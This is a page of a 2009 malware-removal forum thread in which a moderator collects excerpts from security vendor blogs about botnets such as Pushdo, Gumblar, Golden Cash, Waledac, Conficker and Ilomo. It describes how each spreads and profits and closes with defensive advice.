News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
October 31, 2014, 00:18:39
Pages: 1 2 [3] 4 5   Go Down
  Print  
Topic: Pandemic of the botnets 2009  (Read 28220 times)
0 Members and 1 Guest are viewing this topic.
« Reply #30 on: May 13, 2009, 11:34:37 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

- http://blog.trendmicro.com/pushdocutwail-%E2%80%93-the-art-of-spamming/
May 12, 2009 - "... One of the biggest spamming botnets out there is Pushdo. This botnet has managed to stay under the radar since 2007 even though it has been reported to be responsible for a huge percentage of the spam worldwide. It has even managed to make it consistently to the Top 5 largest botnets without ever reaching number one. There are reports of 7.7 billion spammed emails per day coming from this botnet, which puts it in the Top 2 largest spamming botnets worldwide... One of the latest batches contains an executable which displayed popup ads to the user, most probably from an advertiser who paid good money for the mass-deployment of their software. The only component that is always present is the spamming engine, which some antivirus vendors have dubbed as Cutwail..."

- http://blog.trendmicro.com/pushdocutwail-%E2%80%93-from-russia-with-love-part-2-of-5/
May 13, 2009 - "... The famous Storm botnet from 2008 had strong links to the so-called Russian Business Network operating out of St.Petersburg, and from our research it appears that Pushdo is linked to the Moscow area. Like other spam botnets Pushdo’s spamming component, known as Cutwail, sends spam in waves, each advertising a particular service. Normally these consist of porn, pharmacy spam etc – but it was when we started to see ads for Salsa classes and Construction services that we became really interested... As part of our research we contacted the gang on one of the numbers they provided, posing as a potential customer of their spamming services. As customer service satisfaction goes these guys were very helpful, providing us with bank account details that we could pay them through, and even offering to pick up the money in person if we were based in Moscow. On top of that they would throw in a free website design to promote our business, and offered to craft their “advertising mail services” (that’s unsolicited spam to you and me) to best avoid anti-spam signatures..."

(Screenshots available at both URLs above.)

 Evil or Very Mad
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #31 on: May 15, 2009, 03:45:09 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

- http://preview.tinyurl.com/rbxxwa
May 14, 2009 PC World - "A new round of website hijacks is attempting to install malicious, Google-focused software on unpatched PCs, according to security company ScanSafe, further cementing the drive-by-download approach as a bad-guy tactic of choice. The attack, dubbed "Gumblar" by ScanSafe*, starts by hijacking legitimate sites and inserting attack code. The more than 1,500 hacked sites, including Tennis.com and Variety.com, don't represent an especially huge number, but it's growing rapidly. Since last week, the attack has grown by 80 percent, according to the company, and has spiked 188 percent since yesterday.
The inserted attack code attempts to identify old, unpatched vulnerabilities on a victim PC that browses a hacked site, and will take advantage of any discovered hole to install malware. These kinds of drive-by-download attacks are sneaky and dangerous, but the good news is that while the actual exploits used vary as time passes, the company says none have yet gone after zero-day holes that don't yet have a fix available. The attack code has largely gone after PDF and Flash flaws discovered in the last year..."
* http://blog.scansafe.com/journal/2009/5/14/gumblar-qa.html

- http://www.theregister.co.uk/2009/05/14/viral_web_infection/
14 May 2009 - "... The exploit code is unique for every website, making it impossible to identify a compromised site until someone has accidentally surfed there. It uses obfuscated Javascript that's burrowed deep into a website's source code to exploit unpatched vulnerabilities in a visitor's Adobe Flash and Reader programs. Victims then join a botnet that manipulates their Google search results... By injecting ads and links into certain searches, infected users see results that are different than they would otherwise be..."

Gumblar .cn exploit
- http://preview.tinyurl.com/r5cplm
07 May 09 (Unmask Parasites blog)

More Facts about the Gumblar attack
- http://preview.tinyurl.com/qg5c8d
15 May 09 (Unmask Parasites blog)

Troj/JSRedir-R attacks
- http://www.sophos.com/blogs/sophoslabs/v/post/4422
May 14, 2009

http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... Malicious software includes 24 scripting exploit(s), 6 trojan(s)... site has hosted malicious software over the past 90 days. It infected 12799 domain(s)..."

 Shocked Evil or Very Mad
« Last Edit: May 17, 2009, 02:37:11 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #32 on: May 19, 2009, 01:12:46 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

- http://www.secureworks.com/research/blog/index.php/2009/05/12/following-the-trojan-trail/
May 12, 2009 - "... The "Finjan botnet" appears to be large... credit to FireEye for trying to track down the Finjan Botnet that Finjan first reported on. Reading through the Finjan and FireEye write-ups, one is able to reconstruct the trail and also discover the path taken. We can see two major types of Trojans that play a part in this. We have the VBInject Trojan and the AutoIt Trojan... There are two servers on the same network to which -VBInject- phones home: x.x.62.2 and x.x.21.186. The server at x.x.21.186 is no longer responsive and appears down at this time. The server at x.x.62.2 is still up and DNS still responds with that IP address for the domain name used in these attacks. If you actually try to browse to that domain though, you will not arrive at this server. As you can see from reading the FireEye article, the Trojan phones home to /ldr/loadlist.php. It downloads more malware from /ldr/dl/. One of the Trojans it downloads is -AutoIt-... This is the AutoIt Trojan phoning home and the response is to download around 15 pieces of malware...
As you can see by following the trail, gone are the days where you have just one Trojan infection. When you become infected today, it is best to just do a complete reformat of your machine instead of trying to recover it, because you really don’t know how many infections you have. I have read plenty of articles where someone cleans their machine and they think everything is fine only to find more malware days to weeks later.
There is not any perfect AV tool; there is no perfect solution for any one problem. Your best defense is to practice what is called defense in depth and to only go to known websites. Don’t open mail from people you don’t know and be careful opening attachments from people that you do know. Update your OS and software regularly, including AV. Just having AV does not mean that you are protected; you also have to keep it updated
."
• FireEye Blog - http://blog.fireeye.com/research/2009/04/botnetweb-part-ii.html
• Finjan article - http://www.finjan.com/MCRCblog.aspx?EntryId=2237
• Prevx shows ZCHMIB.EXE - http://www.prevx.com/filenames/1521641268775071064-X1/ZCHMIB.EXE.html
• ThreatExpert shows TDSS/Seneka activity - http://www.threatexpert.com/report.aspx?md5=5a1a6f4e83900e86c3e7dc62554318ac

(More detail and screenshots available at the Secureworks URL above.)

.
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #33 on: May 19, 2009, 01:33:27 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



More...

- http://isc.sans.org/diary.html?storyid=6403
Last Updated: 2009-05-18 17:54:18 UTC - "... Gumblar/JSRedir-R drive-bys. Although this malware has been around for a while, several A/V vendors and some relatively mainstream news outlets have recently reported a large increase in websites injected with JSRedir-R/Gumblar. According to Sophos* this malware accounted for approximately 42% of all infected websites detected in the last week, nearly 6 times its closest rival. Although the infection method is not clear, given the variety of servers and platforms, it is most likely weak login credentials..."
* http://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web
May 14, 2009

.
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #34 on: May 19, 2009, 08:43:33 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

- http://preview.tinyurl.com/qlr9ba
05-19-2009 Symantec Security Response Blog - "The malicious code Whac-a-Mole game continues. Just as security vendors start detecting the domains and malware associated with the drive-by download attacks coming from the malicious Gumblar domains, the bad guys are changing the game and popping up from Martuz dot cn, which, according to Who.is, is located in the UK with a 95.129.x.x IP Address. The JavaScript appearing on the websites has also become more obfuscated, making the attacks slightly harder for IT managers and Web administrators to detect. The attackers are easily able to change the obfuscation by substituting portions of the domain name with variables instead of spelling out the domain all at once. The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains. The drive-by download tries to exploit a number of underlying vulnerabilities, including some for Adobe Acrobat and Adobe Flash. Users should make sure that their systems are running the latest versions of these and other third-party applications to help mitigate the risk of being compromised.
So how is that so many websites are compromised at one time? Often it is due to SQL injection errors or direct hacking into the back end of the hosting companies, but it appears that this recent problem may be more about compromised FTP passwords that belonged to the people that administer the websites. In any case, it means the bad guys are able to continually change the malicious code until the admin changes the FTP passwords and blocks the trespassing... We expect the domains and malicious JavaScript appearing on the websites to continually change as one mole is whacked, and another pops up..."

- http://isc.sans.org/diary.html?storyid=6403
Last Updated: 2009-05-19 13:02:01 UTC - "... the dropbox for this trojan, gumblar .cn has been offline since last friday, but a successor has come online, martuz .cn..."

- http://blog.scansafe.com/journal/2009/5/19/gumblar-up-another-7-martuzcn-is-down.html
May 19, 2009
- http://blog.scansafe.com/journal/2009/5/18/japans-geno-gumblar.html
- http://blog.scansafe.com/journal/2009/5/18/gumblar-a-botnet-of-compromised-websites.html

- http://www.us-cert.gov/current/index.html#gumblar_malware_attack_circulating
May 18, 2009

.
« Last Edit: May 20, 2009, 02:38:17 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #35 on: May 21, 2009, 02:55:04 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

Conficker continues to spread
- http://viewfromthebunker.com/2009/05/20/conficker-continues-to-spread/
May 20, 2009 - "... the Symantec threat intelligence team estimates there are 50,000 newly infected PCs a day right now... the US, Brazil and India top the charts."

(Chart available at the URL above.)

- http://isc.sans.org/diary.html?storyid=5860

 Exclamation Evil or Very Mad
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #36 on: May 22, 2009, 08:28:12 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

- http://isc.sans.org/diary.html?storyid=6430
Last Updated: 2009-05-21 19:29:48 UTC - "... client side analysis* and writeup of recent gumblar malware attacks..."
* http://preview.tinyurl.com/pc26gr
May 21, 2009 InfoSec from the trenches - "... Once compromised by the Gumblar/Martuz/Geno attack, victims will have many pieces of malware loaded onto their machines, this malware does the following:
• Steals FTP credentials
• Sends SPAM
• Installs fake anti virus
• Highjacks Google search queries
• Disables security software
The exploits used are for Adobe Acrobat and Adobe Flash Player...
...this is a very large attack encompassing many malicious payloads..."

 Shocked Evil or Very Mad
« Last Edit: May 22, 2009, 08:50:42 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #37 on: May 29, 2009, 03:38:38 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

- http://www.marshal8e6.com/trace/i/Template-Based-Spam,trace.996~.asp
May 28, 2009 - "... Most of today's top spaming botnets, such as Rustock, Pushdo, MegaD, Xarvester and Grum use template based spam bots. This allows the spammers to offload all of the email generation and bandwidth onto the bots. Often a bot will upload the results of each spam run when it has run out of recipient addresses to the control server before downloading a new template. This gives the spammers an idea of how many spam messages their botnet is sending and if the messages were successfully sent to the recipient or blacklisted."

 Evil or Very Mad
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #38 on: June 17, 2009, 08:33:49 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

Golden Cash botnet
- http://www.finjan.com/MCRCblog.aspx?EntryId=2281
June 17, 2009 - "... A user visits a legitimate compromised website which contains malicious Iframe. This Iframe causes the victim’s browser to pull the exploit code from a server armed with the exploit toolkit. Upon successful exploitation, a special build of a Trojan, created for the attacker, is being pulled from Golden Cash server. Once installed, the Trojan reports back to the Golden Cash server and the attacker’s account at Golden Cash is credited with currency. The first instruction sent by Golden Cash to the victim’s machine, is to install an FTP-grabber (to steal FTP-credentials). Our research found about 100,000 stolen FTP-credentials on the Golden Cash server. The victim’s machine is now in a pool of infected machines controlled by Golden Cash and being auctioned to other criminals, using a different website for buyers. From time to time, the victim’s machine gets instructions to install malware on behalf of the criminal-customer. The Trojan on the victim machine reports back to Golden Cash on each successful installation of the customer’s malware and the criminal-customer account is charged with currency. The victim machine is back in the ‘available for more infections’ pool.... the botnet spreads using distributors. For each distributor, a special bot build is created. The special build assists the cybercriminal to track the installations of each distributor... Some of the stolen FTP-credentials were used to inject malicious Iframe to the webpages that were stored on the FTP server. The reason for this was to infect more machines and generate organic growth. The C&C server is hosted in Texas, US; the registrant country is China. The “proxy’ website that tunnels traffic to the C&C server is hosted in Krasnodar, Russia."

(Screenshots available at the URL above.)

 Evil or Very Mad Headache Evil or Very Mad Questioning or Suspicious
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #39 on: July 08, 2009, 04:30:36 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

- http://www.eset.com/threat-center/blog/?p=1285
July 7, 2009 - "... After 4th July, we have noticed an increase in the number of emails in circulation, and this week will be even more active. We believe that, like other campaigns, this one will last at least 15 days. However, what many readers may be wondering is why Waledac was “asleep” so many months. The reality is that the Trojan wasn’t spreading at that point. However, the botnet that was built with Waledac, remained as active as ever; working mainly to achieve their most important goal: to send spam. At ESET Latinamerica’s Laboratory, we made some tests to enable us to share information with users that shows the importance of staying uninfected: if my computer is infected with Waledac, how much spam does it send? We infected a computer in the laboratory with one of the Waledac trojans...
After that, we used a tool to monitor network traffic to see how many emails were sent by the botnet, since the system became infected . We made an initial measurement in 4 stages over a period of one hour (at different times of day), and the results were as follows:
• Stage 1: between 18:00 and 19:00 hs. 6968 emails were sent
• Stage 2: between 20:30 and 21:30 hs. 7148 emails were sent
• Stage 3: between 10:00 and 11:00 hs. 5610 emails were sent
• Stage 4: Between 13:00 and 14:00 hs. 6568 emails were sent
Taking the average of emails sent per hour (6548 emails), it is estimated that an infected computer can send about 150,000 emails a day. To be even clearer, that represents nearly two emails per second...  If we consider that the network is estimated to consist of at least 20,000 infected computers, it can be seen that the botnet has a theoretical spam-sending capacity of 3 billion emails daily... many users will now understand why their computers work so slowly when their systems are infected..."

 Shocked
« Last Edit: July 08, 2009, 17:40:23 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #40 on: July 16, 2009, 16:14:34 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

Malware authors exploiting Conficker
- http://www.techworld.com/security/news/index.cfm?newsID=119223
15 July 2009 - "Creators of Waledac malware have used the Conficker botnet as a tool to spread malware of their own, marking the first time Conficker was made available for hire, according to Cisco. Writing in its mid-yearly security report*, Cisco said that this was symptomatic of a wider trend of malware purveyors using established business practices to expand their illegal enterprises. Cisco likened the arrangement between Waledac and Conficker to a partner ecosystem, a term Cisco uses to describe its collaboration with other vendors. Waledac used the Conficker distribution channel to send spam and to expand its own botnet... Web sites that are infected to download malware to unsuspecting visitors will increase, the report predicted. These sites represent nearly 90 percent of all web-based threats, the report says. Creation of botnets would be a particular goal of this type of malware..."
* http://www.cisco.com/en/US/prod/vpndevc/annual_security_report.html

 Evil or Very Mad
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #41 on: July 24, 2009, 03:40:29 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

Botnet money...
- http://www.viruslist.com/en/analysis?pubid=204792068
July 22, 2009 - "In the past ten years, botnets have evolved from small networks of a dozen PCs controlled from a single C&C (command and control center) into sophisticated distributed systems comprising millions of computers with decentralized control. Why are these enormous zombie networks created? The answer can be given in a single word: money. A botnet, or zombie network, is a network of computers infected with a malicious program that allows cybercriminals to control the infected machines remotely without the users’ knowledge. Zombie networks have become a source of income for entire groups of cybercriminals. The invariably low cost of maintaining a botnet and the ever diminishing degree of knowledge required to manage one are conducive to growth in popularity and, consequently, the number of botnets... Botnet owners or developers who have been prosecuted can be counted on the fingers of two hands. Which is not the case with botnets that are live on the Internet: the number of these has exceeded 3600... Without help from users, combating botnets cannot be effective. It is home computers that make up the lion’s share of the enormous army of bots. Neglecting to stick to simple security rules, such as using antivirus software, using strong account passwords and disabling the AutoPlay feature for removable media, can result in your computer becoming another botnet member, providing cybercriminals with your data and resources..."

 Exclamation
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #42 on: August 14, 2009, 14:14:16 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

Twitter-based botnet command channel
UPDATED TO ADD STATS AND JAIKU PROFILE AND A TUMBLR PROFILE
- http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel/
August 13, 2009 - "While digging around I found a botnet that uses Twitter as its command and control structure. Basically what it does is use the status messages to send out new links to contact, then these contain new commands or executables to download and run. It’s an infostealer operation. The account in question is under analysis by Twitter’s security team. I spotted it because a bot uses the RSS feed to get the status updates. As for the original bot in question that fetches the updates, here’s the VirusTotal analysis*, where you can see it’s detected by 19/41 (46.34%) AV tools under evaluation. We can look at the status messages and discover more nefarious activity; the bot’s hiding new malcode which is poorly detected this way. The original link from the malcode came from a ShadowServer nightly link report, which they make available to folks. Many thanks to them...
UPDATE 14 Aug 2009 - Via bit.ly, some statistics that suggest the malcode has infected a couple hundred PCs, mostly in Brazil..."

(More detail at the URL above.)

* http://www.virustotal.com/analisis/6a6c334ffe5c8e60b1de37582b73a642c68d2b02b0284000d24c93f899122139-1249801350
File 40d09b7d94da70ede50866c55f48613c-2358.txt received on 2009.08.09 07:02:30 (UTC)
Result: 19/41 (46.34%)

* http://www.virustotal.com/analisis/14fd37ef063f3c13d667e7483803a17ec493395a0d0e0365da4bed60272f311e-1250187288
File gbpm.exe received on 2009.08.13 18:14:48 (UTC)
Result: 9/41 (21.95%)

- http://www.symantec.com/connect/blogs/twittering-botnets
August 14, 2009

Infostealer.Bancos heatmap
- http://www.symantec.com/connect/imagebrowser/view/image/974211/_original

- http://www.symantec.com/connect/blogs/downloader-micro-blogging-and-prophecy
August 16, 2009 - "... A new variant of this threat has emerged that uses not only Twitter but also another social networking and micro-blogging site Jaiku.com. Symantec detects this Trojan as Downloader.Sninfs.B*. Like the previous variant, Downloader.Sninfs.B also attempts to get URLs from obfuscated Twitter status messages. However, if that attempt fails, the Trojan will use the RSS feed from an account registered on Jaiku .com to obtain the location of remote files..."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-081603-5537-99&tabid=2
Discovered: August 16, 2009 = "... may be saved as the following files:
%Temp%\[SET OF RANDOM NUMBERS]\gbpm.exe
%Temp%\[SET OF RANDOM NUMBERS]\gbpm.dll
%Temp%\[SET OF RANDOM NUMBERS]\update.exe (copy of gbpm.exe) ..."

 Evil or Very Mad Shocked Evil or Very Mad
« Last Edit: August 17, 2009, 01:51:51 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #43 on: August 24, 2009, 08:41:07 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

Ilomo botnet - All your info are belong to us
- http://blog.trendmicro.com/all-your-info-are-belong-to-us/
August 24, 2009 - "... Ilomo has (been) active for several years now, and like Pushdo has done so without attracting too much unwanted attention from the security industry. Like Pushdo, the Ilomo threat is quite modular in nature which makes it difficult to see the actions of the overall threat. Added to this is the fact that it uses a commercial virtual machine obfuscator, significantly adding to the effort involved in reverse engineering the malware binaries. Ilomo has two key components to its business plan. The first is good old fashioned information stealing. Ilomo injects its code into the browser and monitors the internet connection waiting for the user to connect to one of over 4000 banking, financial or webmail sites. Not content with simply stealing the user’s credentials, Ilomo can also “piggyback” on the user’s session – transferring funds from an infected user’s account and making a mockery of the bank’s secure login system. Ilomo will also harvest all other login credentials from the machine – ftp, web servers, local administrators etc. These are then used to spread itself across the network and to take control of web servers online, which it will use to host new versions of the malware... Ilomo ‘s second source of revenue is selling “anonymity as a service”. Every infected Ilomo machine acts as a proxy so that criminals can route their illegal activities through different networks and countries. In addition to hiding the criminals identity this proxy network is very useful for defeating another defense built into many banking sites – namely that they can only be accessed from certain countries. If a criminal needs to access a Brazilian bank, they simply use an infected Ilomo machine in Brazil to route the connection..."

(Screenshot available at the URL above.)

 Evil or Very Mad Evil or Very Mad
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #44 on: September 12, 2009, 04:24:59 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

Botweb using compromised Linux servers
- http://blog.stopbadware.org/2009/09/11/botweb-using-compromised-linux-servers
9.11.2009 - "Over at the Unmask Parasites blog, periodic BadwareBusters.org contributor Denis reports on a botweb ... that he’s been investigating:
'What we see here is a long awaited botnet of zombie web servers! A group of interconnected infected web servers with common control center involved in malware distribution. To make things more complex, this botnet of web servers is connected with the botnet of infected home computer (the malware they serve infects computers and turns them into zombies).'
The blog post* contains a much more thorough analysis of the issue and is worth a read, especially if you work for a hosting provider or manage Linux-based web servers..."
* http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/

 Evil or Very Mad Evil or Very Mad
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
 
Pages: 1 2 [3] 4 5   Go Up
  Print  
 
Jump to:  

Powered by SMF 1.1.20 | SMF © 2013, Simple Machines Page created in 0.413 seconds with 20 queries.